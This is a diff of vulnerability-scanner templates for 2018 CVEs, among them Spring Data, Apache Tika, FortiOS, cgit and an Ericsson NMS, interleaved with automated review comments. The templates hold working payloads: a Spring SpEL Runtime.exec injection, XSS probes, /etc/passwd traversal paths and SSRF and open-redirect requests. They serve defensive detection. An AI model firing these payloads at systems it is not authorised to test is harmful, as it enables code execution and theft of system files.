@@ -4,14 +4,18 @@ info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - tags: cve,cve2018,spring,lfi + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 819b07b7a6..50db2cdc93 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml 
@@ -1,7 +1,7 @@ id: CVE-2018-1273 info: - name: Spring Data Commons Unauthenticated RCE + name: Spring Data Commons - Remote Code Execution author: dwisiswant0 severity: critical description: | @@ -10,14 +10,17 @@ info: caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources - or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - tags: cve,cve2018,vmware,rce + or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 + - https://pivotal.io/security/cve-2018-1273 + - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1273 cwe-id: CWE-20 + tags: cve,cve2018,vmware,rce,spring requests: - raw: @@ -27,7 +30,7 @@ requests: Connection: close Content-Type: application/x-www-form-urlencoded - name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei payloads: command: @@ -41,3 +44,5 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index cd23caa054..59dc289d29 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml 
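Review bot: The rewritten description line in CVE-2018-1273.yaml fixes the curly apostrophe but keeps the typo "binding hat can lead"; it should read `or using Spring Data's projection-based request payload binding that can lead to a remote code execution attack.`. The `description: |` block scalar this line belongs to starts above the hunk, so the rest of the text is outside this view. The `§command§` → `{{command}}` placeholder change on the raw request is the commit's own fix and needs nothing further.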
@@ -9,12 +9,12 @@ info: - https://github.com/unh3x/just4cve/issues/10 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 - tags: cve,cve2018,zoho,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 + tags: cve,cve2018,zoho,xss,manageengine requests: - method: GET diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 87f73ec29a..1805b0a5ec 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml 
@@ -4,15 +4,17 @@ info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu severity: high + description: From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - tags: cve,cve2018,apache,tika,rce + - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E + - http://www.securityfocus.com/bid/104001 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2018-1335 - description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." + tags: cve,cve2018,apache,tika,rce requests: - method: PUT diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index 93cc9387a3..3ad6d6e608 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml 
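Review bot: The `description` added to CVE-2018-1335.yaml states the affected range as "versions 1.7 to 1.17", while the unchanged `name` on the line above says "Apache Tika 1.15-1.17"; the two should agree, so confirm the range against the Apache announcement already in `reference` and correct whichever is wrong (the name would become `Apache Tika 1.7-1.17 Header Command Injection` if the description is right). The `classification` block here has no `cwe-id`, unlike every other classification in this commit; add `cwe-id: <CWE from the NVD record>` for consistency.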
@@ -1,19 +1,20 @@ id: CVE-2018-13379 info: - name: FortiOS - Credentials Disclosure + name: Fortinet FortiOS - Credentials Disclosure author: organiccrap severity: critical - tags: cve,cve2018,fortios - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-13379 - cwe-id: CWE-22 - description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests." + description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-13379 + cwe-id: CWE-22 + tags: cve,cve2018,fortios requests: - method: GET @@ -23,3 +24,5 @@ requests: - type: word words: - "var fgt_lang" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index 96cfe5534c..ec56ed0b24 100644 --- a/cves/2018/CVE-2018-13380.yaml +++ b/cves/2018/CVE-2018-13380.yaml 
@@ -2,34 +2,40 @@ id: CVE-2018-13380
 info:
 name: Fortinet FortiOS Cross-Site Scripting
- author: shelld3v
+ author: shelld3v,AaronChen0
 severity: medium
 description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- tags: cve,cve2018,fortios,xss
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
+ - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
+ - https://fortiguard.com/advisory/FG-IR-18-383
+ - https://fortiguard.com/advisory/FG-IR-20-230
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
 cve-id: CVE-2018-13380
 cwe-id: CWE-79
+ tags: cve,cve2018,fortios,xss,fortinet
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
+ - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
 - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
 matchers-condition: and
 matchers:
 - type: word
+ part: body
 words:
 - ""
- part: body
+ - ""
+ condition: or
 - type: word
+ part: header
 words:
 - "application/json"
- part: header
 negative: true
 - type: status
diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml
index 3f6afd77f7..fd9ee56799 100644
--- a/cves/2018/CVE-2018-13980.yaml
+++ b/cves/2018/CVE-2018-13980.yaml
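Review bot: The body matcher's two `words` entries read as empty strings (`- ""` twice) in this hunk; if that is what the committed file contains rather than `<svg/onload=alert(1337)>` / `<script>alert(1337)</script>` markup that was stripped in rendering, an empty word matches any body and the template fires on every non-JSON 200 response from either path. Worth verifying the committed file, and in either case the matcher should look for the reflected payloads verbatim, e.g. `- "<svg/onload=alert(1337)>"` and `- "<script>alert(1337)</script>"` under `part: body` with `condition: or`, which is what the URL-encoded paths above decode to. The status matcher is cut off at the end of the hunk.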
@@ -1,19 +1,21 @@
 id: CVE-2018-13980
 info:
- name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure
+ name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval
 author: wisnupramoedya
 severity: medium
 description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
 reference:
 - https://www.exploit-db.com/exploits/45016
 - https://nvd.nist.gov/vuln/detail/CVE-2018-13980
- tags: cve,cve2018,lfi
+ - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/
+ - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html
 classification:
 cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 5.50
+ cvss-score: 5.5
 cve-id: CVE-2018-13980
 cwe-id: CWE-22
+ tags: cve,cve2018,lfi
 requests:
 - method: GET
@@ -25,7 +27,7 @@ requests:
 - type: regex
 regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
 - type: status
 status:
diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml
index cee7520213..443cec53b7 100644
--- a/cves/2018/CVE-2018-14013.yaml
+++ b/cves/2018/CVE-2018-14013.yaml
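Review bot: The classification kept in this hunk (`CVSS:3.1/AV:L/AC:L/PR:L/...`, score 5.5, severity medium) describes a local, authenticated attack, but the description in the same hunk says the issue is unauthenticated file disclosure via `filebrowser.main.php?file=../`, and the template itself sends an unauthenticated GET and greps the response for `/etc/passwd`. Either the vector is NVD's figure for a different aspect of the bug or it is simply wrong for what is detected here; a reader who sees `AV:L` will discount the finding, so add a sentence to the description explaining the discrepancy or rate the template by the remote, unauthenticated read it actually performs. Tightening the regex to `root:.*:0:0:` is a good change.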
@@ -5,13 +5,17 @@ info:
 author: pikpikcu
 severity: medium
 description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
- tags: cve,cve2018,xss,zimbra
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-14013
+ - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
+ - https://bugzilla.zimbra.com/show_bug.cgi?id=109018
+ - https://bugzilla.zimbra.com/show_bug.cgi?id=109017
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
 cve-id: CVE-2018-14013
 cwe-id: CWE-79
+ tags: cve,cve2018,xss,zimbra
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml
index f3452b953f..d8cf45f3a7 100644
--- a/cves/2018/CVE-2018-14064.yaml
+++ b/cves/2018/CVE-2018-14064.yaml
@@ -4,17 +4,17 @@ info:
 name: VelotiSmart Wifi - Directory Traversal
 author: 0x_Akoko
 severity: critical
- description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
+ description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.
 reference:
 - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
 - https://www.exploit-db.com/exploits/45030
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064
- tags: cve,cve2018,lfi,camera,iot
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
 cve-id: CVE-2018-14064
 cwe-id: CWE-22
+ tags: cve,cve2018,lfi,camera,iot
 requests:
 - method: GET
@@ -31,3 +31,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/05/12
diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml
index 18f87e359a..1ae3602c19 100644
--- a/cves/2018/CVE-2018-14574.yaml
+++ b/cves/2018/CVE-2018-14574.yaml
@@ -4,13 +4,7 @@ info:
 name: Django Open Redirect
 author: pikpikcu
 severity: medium
- tags: cve,cve2018,django,redirect
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2018-14574
- cwe-id: CWE-601
- description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect."
+ description: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.
 reference:
 - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/
 - https://usn.ubuntu.com/3726-1/
@@ -18,6 +12,12 @@ info:
 - https://www.debian.org/security/2018/dsa-4264
 - http://www.securityfocus.com/bid/104970
 - https://access.redhat.com/errata/RHSA-2019:0265
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-14574
+ cwe-id: CWE-601
+ tags: cve,cve2018,django,redirect
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml
index 0eaff41a52..ab3eb88100 100644
--- a/cves/2018/CVE-2018-14728.yaml
+++ b/cves/2018/CVE-2018-14728.yaml
@@ -1,19 +1,20 @@
 id: CVE-2018-14728
 info:
- name: Responsive filemanager 9.13.1 - SSRF/LFI
+ name: Responsive filemanager 9.13.1 Server-Side Request Forgery
 author: madrobot
 severity: critical
- tags: cve,cve2018,ssrf,lfi
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2018-14728
- cwe-id: CWE-918
- description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter."
+ description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
 reference:
 - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
 - https://www.exploit-db.com/exploits/45103/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-14728
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-14728
+ cwe-id: CWE-918
+ tags: cve,cve2018,ssrf,lfi
 requests:
 - method: POST
@@ -27,3 +28,5 @@ requests:
 regex:
 - "root:.*:0:0:"
 part: body
+
+# Enhanced by mp on 2022/04/01
diff --git a/cves/2018/CVE-2018-14912.yaml b/cves/2018/CVE-2018-14912.yaml
new file mode 100644
index 0000000000..ccb43cade4
--- /dev/null
+++ b/cves/2018/CVE-2018-14912.yaml
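Review bot: The new name and description present this purely as server-side request forgery, but the matcher in the second hunk still greps the response body for `root:.*:0:0:`, i.e. the success criterion is a local file read through the SSRF (presumably a `file://` URL in the `url` parameter — the POST body is outside the hunk) and `tags` keeps `lfi`. If the request body does use a `file://` URI, the description should say so, e.g. `... via the url parameter, which also accepts file:// URIs and allows local file disclosure`; otherwise a reader cannot tell why a passwd regex proves the bug. Dropping `SSRF/LFI` from the name while keeping the `lfi` tag is the inconsistency to resolve either way.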
@@ -0,0 +1,35 @@
+id: CVE-2018-14912
+
+info:
+ name: cgit < 1.2.1 Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
+ reference:
+ - https://cxsecurity.com/issue/WLB-2018080034
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-14912
+ - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-14912
+ cwe-id: CWE-22
+ tags: cve,cve2018,cgit,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/18
diff --git a/cves/2018/CVE-2018-14916.yaml b/cves/2018/CVE-2018-14916.yaml
index 984ff08fd7..5f54fb11ce 100644
--- a/cves/2018/CVE-2018-14916.yaml
+++ b/cves/2018/CVE-2018-14916.yaml
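Review bot: The request hard-codes a repository named `git` (`/cgit/cgit.cgi/git/objects/?path=...`), which looks like the PoC's example repo name rather than anything fixed by cgit; an instance that only serves repositories under other names will answer 404 and the template reports nothing, so coverage depends on a name the scanner has no reason to expect. At minimum document that limitation in the description, e.g. `The request assumes a repository named "git" exists; adjust the path for other repository names.`, and consider trying more than one common name. Separately, `root:[x*]:0:0` will not match a passwd whose password field is empty (`root::0:0:`); the `root:.*:0:0:` form used by the other traversal templates in this commit is more forgiving.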
@@ -1,15 +1,18 @@
 id: CVE-2018-14916
+
 info:
- name: Loytec LGATE-902 Directory Traversal
+ name: Loytec LGATE-902 <6.4.2 - Local File Inclusion
 author: 0x_Akoko
 severity: critical
- description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities.
+ description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
 reference:
 - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
 - https://nvd.nist.gov/vuln/detail/CVE-2018-14916
+ - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
+ - https://seclists.org/fulldisclosure/2019/Apr/12
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
- cvss-score: 9.4
+ cvss-score: 9.1
 cve-id: CVE-2018-14916
 cwe-id: CWE-732
 tags: cve,cve2018,loytec,lfi
@@ -29,3 +32,5 @@ requests:
 - type: status
 status:
 - 200
+
+# Enhanced by mp on 2022/05/12
diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml
new file mode 100644
index 0000000000..babdd309c5
--- /dev/null
+++ b/cves/2018/CVE-2018-14931.yaml
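Review bot: The renamed title and description now say "local file inclusion", but the classification kept in the same hunk (`C:N/I:H/A:H`, `CWE-732`) describes an integrity/availability issue with no confidentiality impact — a vector for the file-deletion bug the old description mentioned, not for a file read — so the metadata now contradicts itself. Either restore the broader wording (`... suffers from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities`) or make the vector match what the request below actually exercises (the request is outside the hunk). Also the added packetstorm link differs from the existing one only by `http://` vs `https://`; drop the duplicate.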
@@ -0,0 +1,30 @@
+id: CVE-2018-14931
+
+info:
+ name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
+ reference:
+ - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
+ - https://www.cvedetails.com/cve/CVE-2018-14931
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-14931
+ cwe-id: CWE-601
+ tags: cve,cve2018,redirect,polarisft,intellect
+
+requests:
+ - method: GET
+
+ path:
+ - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/04/26
diff --git a/cves/2018/CVE-2018-15138.yaml b/cves/2018/CVE-2018-15138.yaml
new file mode 100644
index 0000000000..cca957188f
--- /dev/null
+++ b/cves/2018/CVE-2018-15138.yaml
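Review bot: The only matcher is the `Location` header regex, so a response that carries that header without actually redirecting would be flagged as well; tying the finding to a real redirect is a two-line addition, `matchers-condition: and` plus a status matcher `- type: status` / `status: [301, 302, 303, 307, 308]`. The regex is the shared open-redirect pattern used across the repo and looks correct for the `example.com` payload; the blank line between `- method: GET` and `path:` is harmless but inconsistent with the other new templates in this commit.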
@@ -0,0 +1,34 @@
+id: CVE-2018-15138
+
+info:
+ name: LG-Ericsson iPECS NMS 30M Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
+ reference:
+ - https://cxsecurity.com/issue/WLB-2018080070
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15138
+ - https://www.exploit-db.com/exploits/45167/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-15138
+ cwe-id: CWE-22
+ tags: cve,cve2018,ericsson,lfi,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data"
+ - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml
index 9fa15ec402..c6d6648529 100644
--- a/cves/2018/CVE-2018-15473.yaml
+++ b/cves/2018/CVE-2018-15473.yaml
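Review bot: `root:[x*]:0:0` requires the password field to be exactly `x` or `*`; embedded appliances like this NMS frequently ship a passwd with an empty field (`root::0:0:`), in which case the file is retrieved but never matched and the template stays silent. The `root:.*:0:0:` form the other traversal templates in this commit are being moved to covers that case at no cost. The second path's `%00.jpg` null-byte suffix and the first path's fixed `filepath=/home/wms/www/data` are presumably lifted from the PoC; a one-line comment saying which build each variant targets would help whoever maintains this later.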
@@ -5,18 +5,22 @@ info:
 author: r3dg33k,daffainfo,forgedhallpass
 severity: medium
 description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- tags: network,openssh,cve,cve2018
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
+ - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
+ - https://bugs.debian.org/906236
+ - http://www.openwall.com/lists/oss-security/2018/08/15/5
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
+ cvss-score: 5.3
 cve-id: CVE-2018-15473
 cwe-id: CWE-362
+ tags: network,openssh,cve,cve2018
 network:
 - host:
 - "{{Hostname}}"
- - "{{Hostname}}:22"
+ - "{{Host}}:22"
 matchers:
 - type: regex
diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml
index a6c7089cc6..8e37ed929f 100644
--- a/cves/2018/CVE-2018-15517.yaml
+++ b/cves/2018/CVE-2018-15517.yaml
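Review bot: With both `{{Hostname}}` and `{{Host}}:22` listed, a target supplied as `host:22` resolves to the same endpoint twice and, as far as I can tell, is probed twice — for a user-enumeration check that doubles the noise in sshd logs for no extra signal. The change from `{{Hostname}}:22` to `{{Host}}:22` does fix the old `host:port:22` form, so the intent is presumably "honour a user-supplied port, otherwise default to 22"; a comment saying so, e.g. `# first entry uses the port given on input, second falls back to 22`, would make the duplication on the default port an understood cost. The matchers continue outside the hunk.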
@@ -1,18 +1,21 @@
 id: CVE-2018-15517
 info:
- name: D-LINK Central WifiManager - SSRF
- description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
- reference:
- - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
+ name: D-Link Central WifiManager - Server-Side Request Forgery
 author: gy741
 severity: high
- tags: cve,cve2018,dlink,ssrf,oast
+ description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
+ reference:
+ - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
+ - http://seclists.org/fulldisclosure/2018/Nov/28
+ - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html
 classification:
 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
- cvss-score: 8.60
+ cvss-score: 8.6
 cve-id: CVE-2018-15517
 cwe-id: CWE-918
+ tags: cve,cve2018,dlink,ssrf,oast
 requests:
 - method: GET
@@ -24,3 +27,5 @@ requests:
 part: interactsh_protocol # Confirms the HTTP Interaction
 words:
 - "http"
+
+# Enhanced by mp on 2022/04/06
diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml
index 2304115e39..ee9978be79 100644
--- a/cves/2018/CVE-2018-15535.yaml
+++ b/cves/2018/CVE-2018-15535.yaml
@@ -8,12 +8,14 @@ info:
 reference:
 - https://www.exploit-db.com/exploits/45271
